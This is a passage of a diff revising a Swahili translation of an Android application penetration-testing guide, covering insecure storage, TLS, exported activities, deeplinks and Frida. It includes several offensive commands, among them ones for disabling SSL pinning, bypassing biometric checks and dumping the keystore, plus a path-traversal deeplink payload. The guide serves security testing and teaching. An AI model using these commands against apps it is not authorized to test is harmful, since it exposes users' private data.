zenye nia mbaya. +Katika Android, faili **zilizohifadhiwa** katika **hifadhi ya ndani** zimeundwa kuwa **zinapatikana** pekee na **programu** iliyozitengeneza. Kipimo hiki cha usalama kinatekelezwa na mfumo wa uendeshaji wa Android na kwa ujumla kinatosha kwa mahitaji ya usalama ya programu nyingi. Hata hivyo, waendelezaji wakati mwingine hutumia njia kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` ili **kuruhusu** faili kushirikiwa kati ya programu tofauti. Hata hivyo, njia hizi **hazizuii ufikiaji** wa faili hizi na programu nyingine, ikiwa ni pamoja na zile zenye nia mbaya. -1. **Uchambuzi wa Kimuundo:** +1. **Static Analysis:** - **Hakikisha** kuwa matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Njia hizi **zinaweza kufichua** faili kwa **ufikiaji usioidhinishwa au usio kusudiwa**. -2. **Uchambuzi wa Kijamii:** -- **Thibitisha** **idhini** zilizowekwa kwenye faili zilizoundwa na programu. Kwa haswa, **angalia** kama faili yoyote imewekwa kuwa inasomeka au kuandikwa duniani kote. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaruhusu **programu yoyote** iliyosakinishwa kwenye kifaa, bila kujali asili yake au nia, **kusoma au kubadilisha** faili hizi. +2. **Dynamic Analysis:** +- **Thibitisha** **idhini** zilizowekwa kwenye faili zilizotengenezwa na programu. Kwa haswa, **angalia** kama faili yoyote imewekwa kuwa inasomeka au kuandikwa duniani kote. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaruhusu **programu yoyote** iliyosakinishwa kwenye kifaa, bila kujali asili yake au nia, **kusoma au kubadilisha** faili hizi. **Hifadhi ya Nje** Wakati wa kushughulikia faili kwenye **hifadhi ya nje**, kama vile Kadi za SD, tahadhari fulani zinapaswa kuchukuliwa: -1. **Upatikanaji**: +1. **Ufikivu**: - Faili kwenye hifadhi ya nje ni **zinazosomeka na kuandikwa duniani kote**. Hii inamaanisha programu au mtumiaji yeyote anaweza kufikia faili hizi. 2. **Masuala ya Usalama**: - Kwa sababu ya urahisi wa ufikiaji, inashauriwa **kutohifadhi taarifa nyeti** kwenye hifadhi ya nje. -- Hifadhi ya nje inaweza kuondolewa au kufikiwa na programu yoyote, na kuifanya kuwa na usalama mdogo. +- Hifadhi ya nje inaweza kuondolewa au kufikiwa na programu yoyote, na kufanya kuwa na usalama mdogo. 3. **Kushughulikia Data kutoka Hifadhi ya Nje**: - Daima **fanya uthibitisho wa ingizo** kwenye data iliyopatikana kutoka hifadhi ya nje. Hii ni muhimu kwa sababu data hiyo inatoka kwenye chanzo kisichoaminika. -- Kuhifadhi executable au faili za darasa kwenye hifadhi ya nje kwa ajili ya upakiaji wa dinamik kunakataliwa vikali. -- Ikiwa programu yako inapaswa kupata faili za executable kutoka hifadhi ya nje, hakikisha faili hizi **zimepangwa na kuthibitishwa kwa njia ya kisayansi** kabla ya kupakiwa kwa dinamik. Hatua hii ni muhimu kwa kudumisha uaminifu wa usalama wa programu yako. +- Kuhifadhi executable au faili za darasa kwenye hifadhi ya nje kwa ajili ya upakiaji wa dynamic kunashauriwa kuto kufanywa. +- Ikiwa programu yako inapaswa kupata faili za executable kutoka hifadhi ya nje, hakikisha faili hizi **zimepangwa na kuthibitishwa kwa njia ya cryptographic** kabla ya kupakiwa kwa dynamic. Hatua hii ni muhimu kwa kudumisha uaminifu wa usalama wa programu yako. -Hifadhi ya nje inaweza **kupatikana** katika `/storage/emulated/0`, `/sdcard`, `/mnt/sdcard` +Hifadhi ya nje inaweza kufikiwa katika `/storage/emulated/0`, `/sdcard`, `/mnt/sdcard` > [!TIP] > Kuanzia Android 4.4 (**API 17**), kadi ya SD ina muundo wa saraka ambao **unapunguza ufikiaji kutoka kwa programu hadi saraka ambayo ni maalum kwa programu hiyo**. Hii inazuia programu mbaya kupata ufikiaji wa kusoma au kuandika kwenye faili za programu nyingine. @@ -129,7 +129,7 @@ Hifadhi ya nje inaweza **kupatikana** katika `/storage/emulated/0`, `/sdcard`, ` **Taarifa nyeti zilizohifadhiwa kwa maandiko wazi** - **Mipangilio ya pamoja**: Android inaruhusu kila programu kuhifadhi kwa urahisi faili za xml katika njia `/data/data//shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti kwa maandiko wazi katika folda hiyo. -- **Mikakati**: Android inaruhusu kila programu kuhifadhi kwa urahisi mikakati ya sqlite katika njia `/data/data//databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa maandiko wazi katika folda hiyo. +- **Maktaba**: Android inaruhusu kila programu kuhifadhi kwa urahisi maktaba za sqlite katika njia `/data/data//databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa maandiko wazi katika folda hiyo. ### Broken TLS @@ -142,21 +142,21 @@ sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER); ``` Njia nzuri ya kujaribu hii ni kujaribu kukamata trafiki kwa kutumia proxy kama Burp bila kuidhinisha Burp CA ndani ya kifaa. Pia, unaweza kuunda na Burp cheti kwa jina la mwenyeji tofauti na kulitumika. -### Uthibitishaji wa Kifaa +### Uthibitishaji wa Kificho **Mchakato Mbaya wa Usimamizi wa Funguo** -Wakandarasi wengine huhifadhi data nyeti katika hifadhi ya ndani na kuificha kwa funguo zilizowekwa kwa nguvu/kutabirika katika msimbo. Hii haipaswi kufanywa kwani baadhi ya kurudi nyuma kunaweza kuruhusu washambuliaji kutoa taarifa za siri. +Wakandarasi wengine huhifadhi data nyeti katika hifadhi ya ndani na kuificha kwa funguo zilizowekwa kwa ngumu/zinazoweza kutabiriwa katika msimbo. Hii haipaswi kufanywa kwani baadhi ya kurudi nyuma kunaweza kuruhusu washambuliaji kutoa taarifa za siri. **Matumizi ya Algorithimu zisizo Salama na/au Zilizopitwa na Wakati** -Wakandarasi hawapaswi kutumia **algorithimu zilizopitwa na wakati** kufanya **ukaguzi**, **hifadhi** au **tuma** data. Baadhi ya algorithimu hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumika kuhifadhi nywila kwa mfano, hashes zinazostahimili **brute-force** zinapaswa kutumika na chumvi. +Wakandarasi hawapaswi kutumia **algorithimu zilizopitwa na wakati** kufanya **ukaguzi**, **hifadhi** au **tuma** data. Baadhi ya algorithimu hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumika kuhifadhi nywila kwa mfano, hashes zinazopinga **brute-force** zinapaswa kutumika na chumvi. ### Ukaguzi Mwingine -- Inapendekezwa **kuficha APK** ili kufanya kazi ya mhandisi wa kurudi kuwa ngumu kwa washambuliaji. +- Inapendekezwa **kuhifadhi APK** ili kufanya kazi ya mhandisi wa kurudi kuwa ngumu kwa washambuliaji. - Ikiwa programu ni nyeti (kama programu za benki), inapaswa kufanya **ukaguzi wake mwenyewe kuona kama simu imejikita** na kuchukua hatua. -- Ikiwa programu ni nyeti (kama programu za benki), inapaswa kuangalia ikiwa **emulator** inatumika. +- Ikiwa programu ni nyeti (kama programu za benki), inapaswa kuangalia kama **emulator** inatumika. - Ikiwa programu ni nyeti (kama programu za benki), inapaswa **kuangalia uadilifu wake kabla ya kutekeleza** ili kuona kama imebadilishwa. - Tumia [**APKiD**](https://github.com/rednaga/APKiD) kuangalia ni compiler/packer/obfuscator gani ilitumika kujenga APK @@ -180,9 +180,9 @@ Soma ukurasa ufuatao kujifunza jinsi ya kufikia kwa urahisi msimbo wa C# wa prog Kulingana na [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked ni algorithimu ya Meta inayoshinikiza maudhui ya programu kuwa faili moja. Blogu inazungumzia uwezekano wa kuunda programu inayoshinikiza aina hizi za programu... na njia ya haraka ambayo inahusisha **kutekeleza programu na kukusanya faili zilizoshinikizwa kutoka kwa mfumo wa faili.** -### Uchambuzi wa Msimbo wa Kawaida wa Kiotomatiki +### Uchambuzi wa Msimbo wa Kijamii wa Kiotomatiki -Chombo [**mariana-trench**](https://github.com/facebook/mariana-trench) kina uwezo wa kupata **vulnerabilities** kwa **kuchanganua** **msimbo** wa programu. Chombo hiki kina mfululizo wa **vyanzo vilivyofahamika** (ambavyo vinaonyesha kwa chombo **mahali** ambapo **ingizo** linadhibitiwa na mtumiaji), **sinks** (ambazo zinaonyesha kwa chombo **mahali hatari** ambapo ingizo la mtumiaji mbaya linaweza kusababisha madhara) na **kanuni**. Kanuni hizi zinaonyesha **mchanganyiko** wa **vyanzo-sinks** unaoashiria udhaifu. +Chombo [**mariana-trench**](https://github.com/facebook/mariana-trench) kina uwezo wa kupata **vulnerabilities** kwa **kuchanganua** **msimbo** wa programu. Chombo hiki kina mfululizo wa **vyanzo vilivyofahamika** (ambavyo vinaonyesha kwa chombo **mahali** ambapo **ingizo** linadhibitiwa na mtumiaji), **sinks** (ambazo zinaonyesha kwa chombo **mahali hatari** ambapo ingizo la mtumiaji mbaya linaweza kusababisha madhara) na **sheria**. Sheria hizi zinaonyesha **mchanganyiko** wa **vyanzo-sinks** unaoashiria udhaifu. Kwa maarifa haya, **mariana-trench itakagua msimbo na kupata udhaifu unaowezekana ndani yake**. @@ -196,7 +196,7 @@ Programu inaweza kuwa na siri (funguo za API, nywila, URLs zilizofichwa, subdoma bypass-biometric-authentication-android.md {{#endref}} -### Kazi Nyingine za Kuvutia +### Kazi Mwingine za Kuvutia - **Utekelezaji wa msimbo**: `Runtime.exec(), ProcessBuilder(), native code:system()` - **Tuma SMS**: `sendTextMessage, sendMultipartTestMessage` @@ -244,7 +244,7 @@ avd-android-virtual-device.md > [!TIP] > Unapounda emulator mpya kwenye jukwaa lolote kumbuka kwamba kadri skrini inavyokuwa kubwa, ndivyo emulator itakavyokuwa polepole. Hivyo chagua skrini ndogo ikiwa inawezekana. -Ili **kufunga huduma za google** (kama AppStore) katika Genymotion unahitaji kubofya kitufe kilichochorwa kwa rangi nyekundu kwenye picha ifuatayo: +Ili **kufunga huduma za google** (kama AppStore) katika Genymotion unahitaji kubofya kitufe kilichochorwa kwa rangi nyekundu katika picha ifuatayo: ![](<../../images/image (277).png>) @@ -257,13 +257,13 @@ Unahitaji kuwasha **chaguzi za ufuatiliaji** na itakuwa vizuri ikiwa unaweza **k 1. **Mipangilio**. 2. (Kuanzia Android 8.0) Chagua **Mfumo**. 3. Chagua **Kuhusu simu**. -4. Bonyeza **Nambari ya Ujenzi** mara 7. -5. Rudi nyuma na utapata **Chaguzi za Mwandishi**. +4. Bonyeza **Nambari ya kujenga** mara 7. +5. Rudi nyuma na utapata **Chaguzi za Wataalamu**. -> Mara baada ya kufunga programu, jambo la kwanza unapaswa kufanya ni kujaribu na kuchunguza inafanya nini, inafanya kazi vipi na kuzoea nayo.\ +> Mara tu umepakia programu, jambo la kwanza unapaswa kufanya ni kujaribu na kuchunguza inafanya nini, inafanya kazi vipi na kuzoea nayo.\ > Nitapendekeza **kufanya uchambuzi huu wa awali wa kijamii kwa kutumia MobSF uchambuzi wa kijamii + pidcat**, ili tuweze **kujifunza jinsi programu inavyofanya kazi** wakati MobSF **inakamata** data nyingi **za kuvutia** ambazo unaweza kupitia baadaye. -### Kuvuja kwa Data Isiyokusudiwa +### Kuvuja kwa Data zisizokusudiwa **Kumbukumbu** @@ -275,7 +275,7 @@ Wakandarasi wanapaswa kuwa waangalifu kuhusu kufichua **taarifa za ufuatiliaji** **Kuhifadhi Kumbukumbu za Nakala/Pasta** -Mfumo wa **clipboard-based** wa Android unaruhusu kazi za nakala-na-pasta katika programu, lakini unatoa hatari kwani **programu nyingine** zinaweza **kufikia** clipboard, na hivyo kufichua data nyeti. Ni muhimu **kuondoa kazi za nakala/pasta** kwa sehemu nyeti za programu, kama vile maelezo ya kadi ya mkopo, ili kuzuia kuvuja kwa data. +Mfumo wa **clipboard-based** wa Android unaruhusu kazi za nakala-na-pasta katika programu, lakini unatoa hatari kwani **programu nyingine** zinaweza **kufikia** clipboard, na hivyo kuweza kufichua data nyeti. Ni muhimu **kuondoa kazi za nakala/pasta** kwa sehemu nyeti za programu, kama vile maelezo ya kadi ya mkopo, ili kuzuia kuvuja kwa data. **Kumbukumbu za Kuanguka** @@ -285,7 +285,7 @@ Kama pentester, **jaribu kuangalia kumbukumbu hizi**. **Data za Uchambuzi Zinatumwa kwa Vyama vya Tatu** -Programu mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza bila kukusudia **kuvuja data nyeti** kutokana na utekelezaji usio sahihi na wakandarasi. Ili kubaini uwezekano wa kuvuja kwa data, inapendekezwa **kukamata trafiki ya programu** na kuangalia ikiwa kuna taarifa nyeti zinazotumwa kwa huduma za vyama vya tatu. +Programu mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza bila kukusudia **kuvuja data nyeti** kutokana na utekelezaji usio sahihi na wakandarasi. Ili kubaini uwezekano wa kuvuja kwa data, inapendekezwa **kukamata trafiki ya programu** na kuangalia kama kuna taarifa nyeti zinazotumwa kwa huduma za vyama vya tatu. ### SQLite DBs @@ -303,12 +303,12 @@ Drozer ni chombo muhimu kwa **kuvunjia shughuli zilizotolewa, huduma zilizotolew ### Kuvunja Shughuli Zilizotolewa -[**Soma hii ikiwa unataka kufreshi kile ni Shughuli ya Android.**](android-applications-basics.md#launcher-activity-and-other-activities)\ +[**Soma hii ikiwa unataka kufreshi kile kilicho shughuli ya Android.**](android-applications-basics.md#launcher-activity-and-other-activities)\ Pia kumbuka kwamba msimbo wa shughuli huanza katika **`onCreate`** njia. **Kupita Uthibitishaji** -Wakati Shughuli inapotolewa unaweza kuita skrini yake kutoka programu ya nje. Kwa hivyo, ikiwa shughuli yenye **taarifa nyeti** ime **tolewa** unaweza **kupita** mitambo ya **uthibitishaji** **ili kuipata.** +Wakati Shughuli inapotolewa unaweza kuita skrini yake kutoka programu ya nje. Hivyo, ikiwa shughuli yenye **taarifa nyeti** ime **tolewa** unaweza **kupita** mitambo ya **uthibitishaji** **kuipata.** [**Jifunze jinsi ya kuvunja shughuli zilizotolewa na Drozer.**](drozer-tutorial/index.html#activities) @@ -319,14 +319,14 @@ Unaweza pia kuanzisha shughuli iliyotolewa kutoka adb: ```bash adb shell am start -n com.example.demo/com.example.test.MainActivity ``` -**NOTE**: MobSF itagundua kama ni hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika shughuli, lakini kutokana na [hii](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu katika toleo za zamani (API versions < 21). +**NOTE**: MobSF itagundua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika shughuli, lakini kutokana na [hii](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu katika toleo za zamani (API versions < 21). > [!TIP] > Kumbuka kwamba kupita kwa idhini si kila wakati udhaifu, itategemea jinsi kupita kunavyofanya kazi na ni taarifa gani zinazoonyeshwa. **Kuvuja kwa taarifa nyeti** -**Shughuli zinaweza pia kurudisha matokeo**. Ikiwa unafanikiwa kupata shughuli iliyosambazwa na isiyo na ulinzi inayoita **`setResult`** na **kurudisha taarifa nyeti**, kuna uvujaji wa taarifa nyeti. +**Shughuli zinaweza pia kurudisha matokeo**. Ikiwa unapata shughuli iliyosambazwa na isiyo na ulinzi inayoita **`setResult`** na **kurudisha taarifa nyeti**, kuna uvujaji wa taarifa nyeti. #### Tapjacking @@ -382,7 +382,7 @@ Kila wakati unapotafuta deeplink hakikisha kuwa **haipokei data nyeti (kama nywi **Parameters in path** Unapaswa **kuangalia pia kama deeplink yoyote inatumia parameter ndani ya njia** ya URL kama: `https://api.example.com/v1/users/{username}` , katika kesi hiyo unaweza kulazimisha usafiri wa njia kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\ -Kumbuka kwamba ikiwa utapata mwisho sahihi ndani ya programu unaweza kuwa na uwezo wa kusababisha **Open Redirect** (ikiwa sehemu ya njia inatumika kama jina la kikoa), **account takeover** (ikiwa unaweza kubadilisha maelezo ya watumiaji bila CSRF token na mwisho ulio na udhaifu ulitumia njia sahihi) na udhaifu mwingine wowote. Maelezo zaidi [hapa](http://dphoeniixx.com/2020/12/13-2/). +Kumbuka kwamba ikiwa utapata mwisho sahihi ndani ya programu unaweza kuwa na uwezo wa kusababisha **Open Redirect** (ikiwa sehemu ya njia inatumika kama jina la kikoa), **kuchukua akaunti** (ikiwa unaweza kubadilisha maelezo ya watumiaji bila CSRF token na mwisho ulio hatarini unatumia njia sahihi) na hatari nyingine yoyote. Maelezo zaidi [hapa](http://dphoeniixx.com/2020/12/13-2/). **More examples** @@ -391,12 +391,12 @@ Ripoti ya [bug bounty](https://hackerone.com/reports/855618) kuhusu viungo (_/.w ### Transport Layer Inspection and Verification Failures - **Vyeti havikaguliwi kila wakati ipasavyo** na programu za Android. Ni kawaida kwa programu hizi kupuuza onyo na kukubali vyeti vilivyojitegemea au, katika baadhi ya matukio, kurudi kutumia muunganisho wa HTTP. -- **Majadiliano wakati wa handshake ya SSL/TLS wakati mwingine ni dhaifu**, yakitumia cipher suites zisizo salama. Udhaifu huu unafanya muunganisho uwe hatarini kwa mashambulizi ya mtu katikati (MITM), kuruhusu washambuliaji kufungua data. -- **Kuenea kwa taarifa za kibinafsi** ni hatari wakati programu zinathibitisha kwa kutumia njia salama lakini kisha kuwasiliana kupitia njia zisizo salama kwa shughuli nyingine. Njia hii inashindwa kulinda data nyeti, kama vile vidakuzi vya kikao au maelezo ya mtumiaji, kutokana na kukamatwa na wahalifu. +- **Majadiliano wakati wa handshake ya SSL/TLS wakati mwingine ni dhaifu**, yakitumia cipher suites zisizo salama. Uthibitisho huu unafanya muunganisho uwe hatarini kwa mashambulizi ya mtu katikati (MITM), ikiruhusu washambuliaji kufungua data. +- **Kuvuja kwa taarifa za kibinafsi** ni hatari wakati programu zinathibitisha kwa kutumia njia salama lakini kisha kuwasiliana kupitia njia zisizo salama kwa shughuli nyingine. Njia hii inashindwa kulinda data nyeti, kama vile vidakuzi vya kikao au maelezo ya mtumiaji, kutokana na kukamatwa na wahalifu. #### Certificate Verification -Tutazingatia **uthibitishaji wa cheti**. Uadilifu wa cheti cha seva lazima uhakikishwe ili kuongeza usalama. Hii ni muhimu kwa sababu usanidi usio salama wa TLS na uhamasishaji wa data nyeti kupitia njia zisizo na usalama zinaweza kuleta hatari kubwa. Kwa hatua za kina za kuthibitisha vyeti vya seva na kushughulikia udhaifu, [**rasilimali hii**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo wa kina. +Tutazingatia **uthibitishaji wa cheti**. Uadilifu wa cheti cha seva lazima uhakikishwe ili kuongeza usalama. Hii ni muhimu kwa sababu mipangilio isiyo salama ya TLS na uhamasishaji wa data nyeti kupitia njia zisizo na usalama inaweza kuleta hatari kubwa. Kwa hatua za kina za kuthibitisha vyeti vya seva na kushughulikia hatari, [**rasilimali hii**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo wa kina. #### SSL Pinning @@ -404,9 +404,9 @@ SSL Pinning ni hatua ya usalama ambapo programu inathibitisha cheti cha seva dhi #### Traffic Inspection -Ili kukagua trafiki ya HTTP, ni muhimu **kusanidi cheti cha zana ya proxy** (mfano, Burp). Bila kusanidi cheti hii, trafiki iliyosimbwa inaweza isionekane kupitia proxy. Kwa mwongozo wa kusanidi cheti ya CA ya kawaida, [**bonyeza hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine). +Ili kukagua trafiki ya HTTP, ni muhimu **kusanidi cheti cha zana ya proxy** (mfano, Burp). Bila kusanidi cheti hiki, trafiki iliyosimbwa inaweza isionekane kupitia proxy. Kwa mwongozo wa kusanidi cheti cha CA cha kawaida, [**bonyeza hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine). -Programu zinazolenga **API Level 24 na juu** zinahitaji marekebisho kwenye Usanidi wa Usalama wa Mtandao ili kukubali cheti cha CA cha proxy. Hatua hii ni muhimu kwa kukagua trafiki iliyosimbwa. Kwa maelekezo ya kubadilisha Usanidi wa Usalama wa Mtandao, [**rejelea mafunzo haya**](make-apk-accept-ca-certificate.md). +Programu zinazolenga **API Level 24 na juu** zinahitaji marekebisho kwenye Mipangilio ya Usalama wa Mtandao ili kukubali cheti cha CA cha proxy. Hatua hii ni muhimu kwa kukagua trafiki iliyosimbwa. Kwa maelekezo ya kubadilisha Mipangilio ya Usalama wa Mtandao, [**rejelea mafunzo haya**](make-apk-accept-ca-certificate.md). Ikiwa **Flutter** inatumika unahitaji kufuata maelekezo katika [**ukurasa huu**](flutter.md). Hii ni kwa sababu, kuongeza cheti kwenye duka hakutafanya kazi kwani Flutter ina orodha yake ya CAs halali. @@ -414,20 +414,20 @@ Ikiwa **Flutter** inatumika unahitaji kufuata maelekezo katika [**ukurasa huu**] Wakati SSL Pinning inatekelezwa, kuipita inakuwa muhimu ili kukagua trafiki ya HTTPS. Njia mbalimbali zinapatikana kwa kusudi hili: -- Kiotomatiki **badilisha** **apk** ili **kuipita** SSLPinning na [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). Faida bora ya chaguo hili, ni kwamba hutahitaji root ili kuipita SSL Pinning, lakini utahitaji kufuta programu na kuisakinisha mpya, na hii haitafanya kazi kila wakati. -- Unaweza kutumia **Frida** (iliyajadiliwa hapa chini) kuipita ulinzi huu. Hapa kuna mwongozo wa kutumia Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/) +- Kiotomatiki **badilisha** **apk** ili **kuipita** SSLPinning kwa kutumia [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). Faida bora ya chaguo hili, ni kwamba hutahitaji root ili kuipita SSL Pinning, lakini utahitaji kufuta programu na kuisakinisha upya, na hii haitafanya kazi kila wakati. +- Unaweza kutumia **Frida** (iliyozungumziwa hapa chini) kuipita ulinzi huu. Hapa kuna mwongozo wa kutumia Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/) - Unaweza pia kujaribu **kuipita SSL Pinning kiotomatiki** kwa kutumia [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"` -- Unaweza pia kujaribu **kuipita SSL Pinning kiotomatiki** kwa kutumia **MobSF dynamic analysis** (iliyofafanuliwa hapa chini) +- Unaweza pia kujaribu **kuipita SSL Pinning kiotomatiki** kwa kutumia **MobSF uchambuzi wa dynamic** (iliyofafanuliwa hapa chini) - Ikiwa bado unafikiri kuna trafiki ambayo hujapata unaweza kujaribu **kupeleka trafiki kwa burp kwa kutumia iptables**. Soma blog hii: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62) #### Looking for Common Web Vulnerabilities -Ni muhimu pia kutafuta udhaifu wa kawaida wa wavuti ndani ya programu. Maelezo ya kina juu ya kutambua na kupunguza udhaifu hizi yapo nje ya upeo wa muhtasari huu lakini yanashughulikiwa kwa kina mahali pengine. +Ni muhimu pia kutafuta hatari za kawaida za wavuti ndani ya programu. Maelezo ya kina juu ya kutambua na kupunguza hatari hizi yapo nje ya upeo wa muhtasari huu lakini yanashughulikiwa kwa kina mahali pengine. ### Frida [Frida](https://www.frida.re) ni zana ya uhandisi wa dynamic kwa waendelezaji, wahandisi wa kurudi, na watafiti wa usalama.\ -**Unaweza kufikia programu inayotembea na kuunganisha mbinu wakati wa wakati wa kukimbia kubadilisha tabia, kubadilisha thamani, kutoa thamani, kukimbia code tofauti...**\ +**Unaweza kufikia programu inayotembea na kuunganisha mbinu wakati wa wakati wa kukarabati tabia, kubadilisha thamani, kutoa thamani, kuendesha code tofauti...**\ Ikiwa unataka kufanya pentest kwenye programu za Android unahitaji kujua jinsi ya kutumia Frida. - Jifunze jinsi ya kutumia Frida: [**Frida tutorial**](frida-tutorial/index.html) @@ -455,9 +455,9 @@ strings * | grep -E "^[a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a ``` ### **Data nyeti katika Keystore** -Katika Android, Keystore ni mahali bora pa kuhifadhi data nyeti, hata hivyo, kwa ruhusa ya kutosha bado **inawezekana kuipata**. Kadri programu zinavyotenda kuhifadhi hapa **data nyeti katika maandiko wazi**, pentests zinapaswa kuangalia kwa mtumiaji wa root au mtu mwenye ufikiaji wa kimwili kwenye kifaa anaweza kuwa na uwezo wa kuiba data hii. +Katika Android, Keystore ni mahali bora pa kuhifadhi data nyeti, hata hivyo, kwa ruhusa ya kutosha bado **inawezekana kuipata**. Kadri programu zinavyotenda kuhifadhi hapa **data nyeti katika maandiko wazi**, pentests zinapaswa kuangalia kwa ajili yake kama mtumiaji wa root au mtu mwenye ufikiaji wa kimwili wa kifaa anaweza kuwa na uwezo wa kuiba data hii. -Hata kama programu imehifadhi data katika keystore, data hiyo inapaswa kuwa imefungwa. +Hata kama programu imehifadhi data katika keystore, data inapaswa kuwa imefungwa. Ili kufikia data ndani ya keystore unaweza kutumia script hii ya Frida: [https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js](https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js) ```bash @@ -465,17 +465,17 @@ frida -U -f com.example.app -l frida-scripts/tracer-cipher.js ``` ### **Fingerprint/Biometrics Bypass** -Kwa kutumia skripti ifuatayo ya Frida inaweza kuwa inawezekana **kuzidi uthibitisho wa alama za vidole** ambayo programu za Android zinaweza kuwa zinafanya ili **kulinda maeneo fulani nyeti:** +Kwa kutumia script ifuatayo ya Frida inaweza kuwa inawezekana **kuzidi uthibitisho wa alama za vidole** ambayo programu za Android zinaweza kuwa zinafanya ili **kulinda maeneo fulani nyeti:** ```bash frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f ``` ### **Picha za Muktadha** -Wakati unapoweka programu katika muktadha, Android huhifadhi **picha ya programu** ili wakati inaporejeshwa kwenye mbele inaanza kupakia picha kabla ya programu ili ionekane kama programu imepakiwa haraka. +Unapoweka programu katika muktadha, Android huhifadhi **picha ya programu** ili wakati inaporejeshwa kwenye mbele inaanza kupakia picha kabla ya programu ili ionekane kama programu imepakiwa haraka. -Hata hivyo, ikiwa picha hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa picha hiyo anaweza **kuchukua taarifa hiyo** (kumbuka kuwa unahitaji root ili kuweza kuifikia). +Hata hivyo, ikiwa picha hii ina **habari nyeti**, mtu mwenye ufikiaji wa picha hiyo anaweza **kuchukua habari hiyo** (kumbuka kuwa unahitaji root ili kuweza kuifikia). -Picha hizo kwa kawaida huhifadhiwa karibu na: **`/data/system_ce/0/snapshots`** +Picha hizo kwa kawaida huhifadhiwa katika: **`/data/system_ce/0/snapshots`** Android inatoa njia ya **kuzuia upigaji picha wa skrini kwa kuweka kipimo cha FLAG_SECURE** katika mpangilio. Kwa kutumia bendera hii, maudhui ya dirisha yanachukuliwa kama salama, na kuzuia kuonekana katika picha za skrini au kuonekana kwenye onyesho lisilo salama. ```bash @@ -487,7 +487,7 @@ Chombo hiki kinaweza kukusaidia kusimamia zana mbalimbali wakati wa uchambuzi wa ### Kuingilia kwa Intent -Wakuu wa programu mara nyingi huunda vipengele vya proxy kama shughuli, huduma, na wapokeaji wa matangazo ambao hushughulikia hizi Intents na kuzipitisha kwa mbinu kama `startActivity(...)` au `sendBroadcast(...)`, ambayo inaweza kuwa hatari. +Wakuu wa programu mara nyingi huunda vipengele vya proxy kama shughuli, huduma, na wapokeaji wa matangazo vinavyoshughulikia hizi Intents na kuzipitisha kwa mbinu kama `startActivity(...)` au `sendBroadcast(...)`, ambayo inaweza kuwa hatari. Hatari iko katika kuruhusu washambuliaji kuanzisha vipengele vya programu visivyoweza kusambazwa au kufikia watoa maudhui nyeti kwa kuhamasisha hizi Intents. Mfano maarufu ni kipengele cha `WebView` kinachobadilisha URLs kuwa vitu vya `Intent` kupitia `Intent.parseUri(...)` na kisha kuvitenda, ambayo inaweza kusababisha kuingilia kwa Intents zenye uharibifu. @@ -502,11 +502,11 @@ Hatari iko katika kuruhusu washambuliaji kuanzisha vipengele vya programu visivy Labda unajua kuhusu aina hii ya udhaifu kutoka kwa Wavuti. Lazima uwe makini sana na udhaifu huu katika programu ya Android: -- **SQL Injection:** Unaposhughulikia maswali ya dynamic au Watoa-Maudhui hakikisha unatumia maswali yaliyowekwa. +- **SQL Injection:** Unaposhughulika na maswali ya dynamic au Watoa-Maudhui hakikisha unatumia maswali yaliyowekwa. - **JavaScript Injection (XSS):** Hakikisha kuwa msaada wa JavaScript na Plugin umezimwa kwa WebViews yoyote (umezimwa kwa default). [Maelezo zaidi hapa](webview-attacks.md#javascript-enabled). - **Inclusion ya Faili za Mitaa:** WebViews zinapaswa kuwa na ufikiaji wa mfumo wa faili umezimwa (umewezeshwa kwa default) - `(webview.getSettings().setAllowFileAccess(false);)`. [Maelezo zaidi hapa](webview-attacks.md#javascript-enabled). - **Cookies za Milele**: Katika kesi kadhaa wakati programu ya android inamaliza kikao, cookie haifutwi au inaweza hata kuhifadhiwa kwenye diski. -- [**Lipu la Usalama** katika cookies](../../pentesting-web/hacking-with-cookies/index.html#cookies-flags) +- [**Bendera Salama** katika cookies](../../pentesting-web/hacking-with-cookies/index.html#cookies-flags) --- @@ -552,8 